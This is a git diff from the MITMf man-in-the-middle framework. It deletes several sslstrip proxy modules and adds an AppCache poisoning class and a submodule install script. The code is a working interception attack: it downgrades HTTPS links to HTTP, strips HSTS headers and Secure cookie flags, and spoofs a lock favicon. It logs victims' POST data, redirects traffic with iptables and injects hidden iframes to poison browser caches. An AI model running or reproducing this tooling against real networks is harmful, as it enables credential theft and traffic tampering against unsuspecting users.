formatter = logging.Formatter("%(asctime)s [ClientRequest] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ClientRequest", formatter)
class ClientRequest(Request):
''' This class represents incoming client requests and is essentially where
the magic begins. Here we remove the client headers we dont like, and then
respond with either favicon spoofing, session denial, or proxy through HTTP
or SSL to the server.
'''
def __init__(self, channel, queued, reactor=reactor):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().hsts
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
#self.uniqueId = random.randint(0, 10000)
#Use are own DNS server instead of reactor.resolve()
self.customResolver = dns.resolver.Resolver()
self.customResolver.nameservers = ['127.0.0.1']
def cleanHeaders(self):
headers = self.getAllHeaders().copy()
if self.hsts:
if 'referer' in headers:
real = self.urlMonitor.real
if len(real) > 0:
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost(str(headers['host']))
log.debug("Modifing HOST header: {} -> {}".format(headers['host'], host))
headers['host'] = host
self.setHeader('Host', host)
if 'accept-encoding' in headers:
del headers['accept-encoding']
log.debug("Zapped encoding")
if self.urlMonitor.caching is False:
if 'if-none-match' in headers:
del headers['if-none-match']
if 'if-modified-since' in headers:
del headers['if-modified-since']
headers['pragma'] = 'no-cache'
return headers
def getPathFromUri(self):
if (self.uri.find("http://") == 0):
index = self.uri.find('/', 7)
return self.uri[index:]
return self.uri
def getPathToLockIcon(self):
if os.path.exists("lock.ico"): return "lock.ico"
scriptPath = os.path.abspath(os.path.dirname(sys.argv[0]))
scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico")
if os.path.exists(scriptPath): return scriptPath
log.warning("Error: Could not find lock.ico")
return "lock.ico"
def handleHostResolvedSuccess(self, address):
log.debug("Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
host = self.getHeader("host")
headers = self.cleanHeaders()
client = self.getClientIP()
path = self.getPathFromUri()
url = 'http://' + host + path
self.uri = url # set URI to absolute
if self.content:
self.content.seek(0,0)
postData = self.content.read()
if self.hsts:
host = self.urlMonitor.URLgetRealHost(str(host))
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict
url = 'http://' + host + path
self.uri = url # set URI to absolute
if real:
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if patchDict:
dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
headers['content-length'] = str(len(postData))
#self.dnsCache.cacheResolution(host, address)
hostparts = host.split(':')
self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
log.debug("Sending expired cookies")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
log.debug("Sending spoofed favicon response")
self.sendSpoofedFaviconResponse()
elif self.urlMonitor.isSecureLink(client, url):
log.debug("Sending request via SSL/TLS: {}".format(url))
self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
else:
log.debug("Sending request via HTTP")
#self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
port = int(hostparts[1])
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
def handleHostResolvedError(self, error):
log.debug("Host resolution error: {}".format(error))
try:
self.finish()
except:
pass
def resolveHost(self, host):
address = self.dnsCache.getCachedAddress(host)
if address != None:
log.debug("Host cached: {} {}".format(host, address))
return defer.succeed(address)
else:
log.debug("Host not cached.")
self.customResolver.port = self.urlMonitor.getResolverPort()
try:
log.debug("Resolving with DNSChef")
address = str(self.customResolver.query(host)[0].address)
return defer.succeed(address)
except Exception:
log.debug("Exception occured, falling back to Twisted")
return reactor.resolve(host)
def process(self):
if self.getHeader('host') is not None:
log.debug("Resolving host: {}".format(self.getHeader('host')))
host = self.getHeader('host').split(":")[0]
if self.hsts:
host = self.urlMonitor.URLgetRealHost(str(host))
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)
def proxyViaHTTP(self, host, method, path, postData, headers, port):
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = ServerConnection
#self.reactor.connectTCP(host, 80, connectionFactory)
self.reactor.connectTCP(host, port, connectionFactory)
def proxyViaSSL(self, host, method, path, postData, headers, port):
clientContextFactory = ssl.ClientContextFactory()
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = SSLServerConnection
self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
def sendExpiredCookies(self, host, path, expireHeaders):
self.setResponseCode(302, "Moved")
self.setHeader("Connection", "close")
self.setHeader("Location", "http://" + host + path)
for header in expireHeaders:
self.setHeader("Set-Cookie", header)
self.finish()
def sendSpoofedFaviconResponse(self):
icoFile = open(self.getPathToLockIcon())
self.setResponseCode(200, "OK")
self.setHeader("Content-type", "image/x-icon")
self.write(icoFile.read())
icoFile.close()
self.finish()

View file

@ -1,62 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
from core.logger import logger
formatter = logging.Formatter("%(asctime)s [DnsCache] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DnsCache", formatter)
class DnsCache:
'''
The DnsCache maintains a cache of DNS lookups, mirroring the browser experience.
'''
_instance = None
def __init__(self):
self.customAddress = None
self.cache = {}
@staticmethod
def getInstance():
if DnsCache._instance == None:
DnsCache._instance = DnsCache()
return DnsCache._instance
def cacheResolution(self, host, address):
self.cache[host] = address
def getCachedAddress(self, host):
if host in self.cache:
return self.cache[host]
return None
def setCustomRes(self, host, ip_address=None):
if ip_address is not None:
self.cache[host] = ip_address
log.debug("DNS entry set: %s -> %s" %(host, ip_address))
else:
if self.customAddress is not None:
self.cache[host] = self.customAddress
def setCustomAddress(self, ip_address):
self.customAddress = ip_address

View file

@ -1,136 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import re
import string
from ServerConnection import ServerConnection
from URLMonitor import URLMonitor
from core.logger import logger
formatter = logging.Formatter("%(asctime)s [SSLServerConnection] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("SSLServerConnection", formatter)
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().hsts
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if self.hsts:
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
log.debug("Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.real
if dominio in real:
v=" Domain=%s"%real[dominio]
log.debug("New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
else:
if (key.lower() == 'set-cookie'):
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
log.debug("Found path-relative link in secure transmission: " + link)
log.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
log.debug("Found relative link in secure transmission: " + link)
log.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceFavicon(self, data):
match = re.search(SSLServerConnection.iconExpression, data)
if (match != None):
data = re.sub(SSLServerConnection.iconExpression,
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
else:
data = re.sub(SSLServerConnection.headExpression,
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
if (self.urlMonitor.isFaviconSpoofing()):
data = self.replaceFavicon(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data

View file

@ -1,273 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import re
import string
import random
import zlib
import gzip
import StringIO
import sys
from user_agents import parse
from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor
from core.proxyplugins import ProxyPlugins
from core.logger import logger
formatter = logging.Formatter("%(asctime)s %(clientip)s [type:%(browser)s-%(browserv)s os:%(clientos)s] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
clientlog = logger().setup_logger("ServerConnection_clientlog", formatter)
formatter = logging.Formatter("%(asctime)s [ServerConnection] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ServerConnection", formatter)
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
comes back is examined. The headers we dont like are removed, and the links are stripped
from HTTPS to HTTP.
'''
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
urlType = re.compile(r"https://", re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
#urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
self.clientInfo = {}
self.plugins = ProxyPlugins()
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().hsts
self.app = URLMonitor.getInstance().app
self.isImageRequest = False
self.isCompressed = False
self.contentLength = None
self.shutdownComplete = False
self.handle_post_output = False
def sendRequest(self):
if self.command == 'GET':
clientlog.info(self.headers['host'], extra=self.clientInfo)
log.debug("Full request: {}{}".format(self.headers['host'], self.uri))
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.iteritems():
log.debug("Sending header: ({}: {})".format(header, value))
self.sendHeader(header, value)
self.endHeaders()
def sendPostData(self):
if self.handle_post_output is False: #So we can disable printing POST data coming from plugins
try:
postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
if len(postdata) > 0:
clientlog.warning("POST Data ({}):\n{}".format(self.headers['host'], postdata), extra=self.clientInfo)
except Exception as e:
if ('UnicodeDecodeError' or 'UnicodeEncodeError') in e.message:
log.debug("{} Ignored post data from {}".format(self.clientInfo['clientip'], self.headers['host']))
self.handle_post_output = False
self.transport.write(self.postData)
def connectionMade(self):
log.debug("HTTP connection made.")
try:
user_agent = parse(self.headers['user-agent'])
self.clientInfo["clientos"] = user_agent.os.family
self.clientInfo["browser"] = user_agent.browser.family
try:
self.clientInfo["browserv"] = user_agent.browser.version[0]
except IndexError:
self.clientInfo["browserv"] = "Other"
except KeyError:
self.clientInfo["clientos"] = "Other"
self.clientInfo["browser"] = "Other"
self.clientInfo["browserv"] = "Other"
self.clientInfo["clientip"] = self.client.getClientIP()
self.plugins.hook()
self.sendRequest()
self.sendHeaders()
if (self.command == 'POST'):
self.sendPostData()
def handleStatus(self, version, code, message):
values = self.plugins.hook()
version = values['version']
code = values['code']
message = values['message']
log.debug("Server response: {} {} {}".format(version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
if self.app:
self.urlMonitor.addRedirection(self.client.uri, value)
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
log.debug("Response is image content, not scanning")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
log.debug("Response is compressed")
self.isCompressed = True
elif (key.lower()== 'strict-transport-security'):
clientlog.info("Zapped a strict-transport-security header", extra=self.clientInfo)
elif (key.lower() == 'content-length'):
self.contentLength = value
elif (key.lower() == 'set-cookie'):
self.client.responseHeaders.addRawHeader(key, value)
else:
self.client.setHeader(key, value)
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
self.client.setHeader("Expires", "0")
self.client.setHeader("Cache-Control", "No-Cache")
if self.length == 0:
self.shutdown()
self.plugins.hook()
if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
for header, value in self.headers.iteritems():
log.debug("Receiving header: ({}: {})".format(header, value))
def handleResponsePart(self, data):
if (self.isImageRequest):
self.client.write(data)
else:
HTTPClient.handleResponsePart(self, data)
def handleResponseEnd(self):
if (self.isImageRequest):
self.shutdown()
else:
#Gets rid of some generic errors
try:
HTTPClient.handleResponseEnd(self)
except:
pass
def handleResponse(self, data):
if (self.isCompressed):
log.debug("Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
data = self.replaceSecureLinks(data)
data = self.plugins.hook()['data']
#log.debug("Read from server {} bytes of data:\n{}".format(len(data), data))
log.debug("Read from server {} bytes of data".format(len(data)))
if (self.contentLength != None):
self.client.setHeader('Content-Length', len(data))
try:
self.client.write(data)
except:
pass
try:
self.shutdown()
except:
log.info("Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
if self.hsts:
sustitucion = {}
patchDict = self.urlMonitor.patchDict
if patchDict:
dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
log.debug("Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)
log.debug("Replacing {} => {}".format(url,nuevaurl))
sustitucion[url] = nuevaurl
if sustitucion:
dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
return data
else:
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
log.debug("Found secure reference: " + url)
url = url.replace('https://', 'http://', 1)
url = url.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
return re.sub(ServerConnection.urlType, 'http://', data)
def shutdown(self):
if not self.shutdownComplete:
self.shutdownComplete = True
try:
self.client.finish()
self.transport.loseConnection()
except:
pass

View file

@ -1,51 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
from core.logger import logger
from twisted.internet.protocol import ClientFactory
formatter = logging.Formatter("%(asctime)s [ServerConnectionFactory] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ServerConnectionFactory", formatter)
class ServerConnectionFactory(ClientFactory):
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
def buildProtocol(self, addr):
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
def clientConnectionFailed(self, connector, reason):
log.debug("Server connection failed.")
destination = connector.getDestination()
if (destination.port != 443):
log.debug("Retrying via SSL")
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
else:
try:
self.client.finish()
except:
pass

View file

@ -1,175 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import re, os
import logging
from core.configwatcher import ConfigWatcher
from core.logger import logger
formatter = logging.Formatter("%(asctime)s [URLMonitor] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("URLMonitor", formatter)
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
server is expecting over SSL. It also keeps track of secure favicon urls.
'''
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = dict()
real = dict()
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
'return"https:"':'return"http:"'
}
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = {}
self.redirects = []
self.faviconReplacement = False
self.hsts = False
self.app = False
self.caching = False
@staticmethod
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()
return URLMonitor._instance
#This is here because I'm lazy
def getResolverPort(self):
return int(ConfigWatcher().config['MITMf']['DNS']['port'])
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
if (re.match(expression, url)):
return True
return (client,url) in self.strippedURLs
def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)]
else:
return 443
def setCaching(self, value):
self.caching = value
def addRedirection(self, from_url, to_url):
for s in self.redirects:
if from_url in s:
s.add(to_url)
return
url_set = set([from_url, to_url])
log.debug("Set redirection: {}".format(url_set))
self.redirects.append(url_set)
def getRedirectionSet(self, url):
for s in self.redirects:
if url in s:
return s
return set([url])
def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
if pathIndex is -1:
pathIndex = len(url)
url += "/"
host = url[methodIndex:pathIndex].lower()
path = url[pathIndex:]
port = 443
portIndex = host.find(":")
if (portIndex != -1):
host = host[0:portIndex]
port = host[portIndex+1:]
if len(port) == 0:
port = 443
if self.hsts:
self.updateHstsConfig()
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
log.debug("SSL host ({}) tokenized ({})".format(host, self.sustitucion[host]))
url = 'http://' + host + path
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
return 'http://'+ self.sustitucion[host] + path
else:
url = method + host + path
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def updateHstsConfig(self):
for k,v in ConfigWatcher().config['SSLstrip+'].iteritems():
self.sustitucion[k] = v
self.real[v] = k
def setHstsBypass(self):
self.hsts = True
def setAppCachePoisoning(self):
self.app = True
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self, host):
log.debug("Parsing host: {}".format(host))
self.updateHstsConfig()
if self.real.has_key(host):
log.debug("Found host in list: {}".format(self.real[host]))
return self.real[host]
else:
log.debug("Host not in list: {}".format(host))
return host

View file

@ -1,102 +0,0 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import os
import logging
import re
import sys
from core.logger import logger
from core.proxyplugins import ProxyPlugins
from scapy.all import get_if_addr, get_if_hwaddr, get_working_if
formatter = logging.Formatter("%(asctime)s [Utils] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Utils", formatter)
def shutdown(message=None):
for plugin in ProxyPlugins().plugin_list:
plugin.on_shutdown()
sys.exit(message)
def set_ip_forwarding(value):
log.debug("Setting ip forwarding to {}".format(value))
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
file.write(str(value))
file.close()
def get_iface():
iface = get_working_if()
log.debug("Interface {} seems to be up and running")
return iface
def get_ip(interface):
try:
ip_address = get_if_addr(interface)
if (ip_address == "0.0.0.0") or (ip_address is None):
shutdown("Interface {} does not have an assigned IP address".format(interface))
return ip_address
except Exception as e:
shutdown("Error retrieving IP address from {}: {}".format(interface, e))
def get_mac(interface):
try:
mac_address = get_if_hwaddr(interface)
return mac_address
except Exception as e:
shutdown("Error retrieving MAC address from {}: {}".format(interface, e))
class iptables:
dns = False
http = False
smb = False
nfqueue = False
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
def flush(self):
log.debug("Flushing iptables")
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
self.dns = False
self.http = False
self.smb = False
self.nfqueue = False
def HTTP(self, http_redir_port):
log.debug("Setting iptables HTTP redirection rule from port 80 to {}".format(http_redir_port))
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port))
self.http = True
def DNS(self, dns_redir_port):
log.debug("Setting iptables DNS redirection rule from port 53 to {}".format(dns_redir_port))
os.system('iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port {}'.format(dns_redir_port))
self.dns = True
def SMB(self, smb_redir_port):
log.debug("Setting iptables SMB redirection rule from port 445 to {}".format(smb_redir_port))
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 445 -j REDIRECT --to-port {}'.format(smb_redir_port))
self.smb = True
def NFQUEUE(self):
log.debug("Setting iptables NFQUEUE rule")
os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0')
self.nfqueue = True

3
install-bdfactory.sh Executable file
View file

@ -0,0 +1,3 @@
#!/bin/bash
git submodule init
git submodule update

154
libs/AppCachePoisonClass.py Normal file
View file

@ -0,0 +1,154 @@
import logging, re, os.path, time
from datetime import date
from sslstrip.DummyResponseTamperer import DummyResponseTamperer
class AppCachePoisonClass(DummyResponseTamperer):
'''
AppCachePosion performs HTML5 AppCache poisioning attack - see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html
'''
mass_poisoned_browsers = []
def tamper(self, url, data, headers, req_headers, ip):
if not self.isEnabled():
return data
if "enable_only_in_useragents" in self.config:
regexp = self.config["enable_only_in_useragents"]
if regexp and not re.search(regexp,req_headers["user-agent"]):
logging.log(logging.DEBUG, "Tampering disabled in this useragent (%s)" % (req_headers["user-agent"]))
return data
urls = self.urlMonitor.getRedirectionSet(url)
(s,element,url) = self.getSectionForUrls(urls)
if not s:
data = self.tryMassPoison(url, data, headers, req_headers, ip)
return data
logging.log(logging.WARNING, "Found URL %s in section %s" % (url, s['__name__']))
p = self.getTemplatePrefix(s)
if element == 'tamper':
logging.log(logging.WARNING, "Poisoning tamper URL with template %s" % (p))
if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r')
data = self.decorate(f.read(), s)
f.close()
elif os.path.exists(p + '.append'): # append file to body
f = open(p + '.append','r')
appendix = self.decorate(f.read(), s)
f.close()
# append to body
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
# add manifest reference
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
elif element == "manifest":
logging.log(logging.WARNING, "Poisoning manifest URL")
data = self.getSpoofedManifest(url, s)
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
elif element == "raw": # raw resource to modify, it does not have to be html
logging.log(logging.WARNING, "Poisoning raw URL")
if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r')
data = self.decorate(f.read(), s)
f.close()
elif os.path.exists(p + '.append'): # append file to body
f = open(p + '.append','r')
appendix = self.decorate(f.read(), s)
f.close()
# append to response body
data += appendix
self.cacheForFuture(headers)
self.removeDangerousHeaders(headers)
return data
def tryMassPoison(self, url, data, headers, req_headers, ip):
browser_id = ip + req_headers.get("user-agent", "")
if not 'mass_poison_url_match' in self.config: # no url
return data
if browser_id in self.mass_poisoned_browsers: #already poisoned
return data
if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]): #not HTML
return data
if 'mass_poison_useragent_match' in self.config and not "user-agent" in req_headers:
return data
if not re.search(self.config['mass_poison_useragent_match'], req_headers['user-agent']): #different UA
return data
if not re.search(self.config['mass_poison_url_match'], url): #different url
return data
logging.log(logging.WARNING, "Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
appendix = self.getMassPoisonHtml()
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip
return data
def getMassPoisonHtml(self):
html = "<div style=\"position:absolute;left:-100px\">"
for i in self.config:
if isinstance(self.config[i], dict):
if self.config[i].has_key('tamper_url') and not self.config[i].get('skip_in_mass_poison', False):
html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.config[i]['tamper_url'] + "\"></iframe>"
return html + "</div>"
def cacheForFuture(self, headers):
ten_years = 315569260
headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)])
